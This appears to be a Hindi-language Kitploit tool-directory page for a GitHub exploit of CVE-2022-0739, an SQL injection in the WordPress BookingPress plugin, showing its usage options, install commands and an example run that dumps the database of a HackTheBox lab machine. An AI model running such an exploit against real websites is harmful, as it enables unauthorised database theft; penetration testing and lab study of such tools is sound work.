Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-0739 — WP BookingPress (< 1.0.11) के लिए एक्सप्लॉइट जो destr4ct POC पर आधारित है। | Kitploit
उपकरण/GitHubGitHub/viardant/cve-2022-0739
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubviardant/cve-2022-0739

CVE-2022-0739

WP BookingPress (< 1.0.11) के लिए एक्सप्लॉइट जो destr4ct POC पर आधारित है।

रिपॉजिटरी देखें
43 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-0739

CVE-2022-0739 BookingPress शोषण पर मेरा दृष्टिकोण, destr4ct के POC पर आधारित - बस अधिक सुंदर।

उदाहरण

HackTheBox के MetaTwo मशीन के विरुद्ध उदाहरण उपयोग, जो एक कमजोर bookingpress प्लगइन (संस्करण 1.0.10) वाला WordPress होस्ट करता है।

root@kitploit:~
python booking-sqlinjector.py -u http://metapress.htb -nu http://metapress.htb/events/ -a -o db_dump

asciicast

उपयोग

root@kitploit:~
usage: booking-sqlinjector.py [-h] -u URL [-o BASENAME] [-p PAYLOAD] [-a] [-v] (-n NONCE | -nu NONCE_URL)

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     URL of WordPress server with vulnerable plugin (http://example.domain)
  -o BASENAME, --out BASENAME
                        Output database schema and dump in JSON format
  -p PAYLOAD, --payload PAYLOAD
                        Payload to inject. Should start with ')'
  -a, --dump-all        Enables whole DB dump
  -v, --verbose         Enables verbose mode
  -n NONCE, --nonce NONCE
                        Nonce that you got as unauthenticated user
  -nu NONCE_URL, --nonce-url NONCE_URL
                        URL where nonce can be extracted (bookingprss form page)

स्थापना

root@kitploit:~
git clone https://github.com/viardant/CVE-2022-0739
cd CVE-2022-0739
pip install -r requirements.txt

अस्वीकरण

TL:DR; केवल शैक्षिक उद्देश्यों के लिए, उन चीजों को न तोड़ें जिनके आप मालिक नहीं हैं या जिनकी पेंटेस्ट करने की अनुमति नहीं है। यदि आप इस प्रोग्राम का उपयोग किसी दुर्भावनापूर्ण उद्देश्य के लिए करते हैं, तो साइबर सुरक्षा देवता आपके कंप्यूटर को इतने विनाशकारी मैलवेयर से मार सकते हैं कि आप चाहेंगे कि आपने बस एक Mac खरीदा होता।

टूल डाउनलोड करें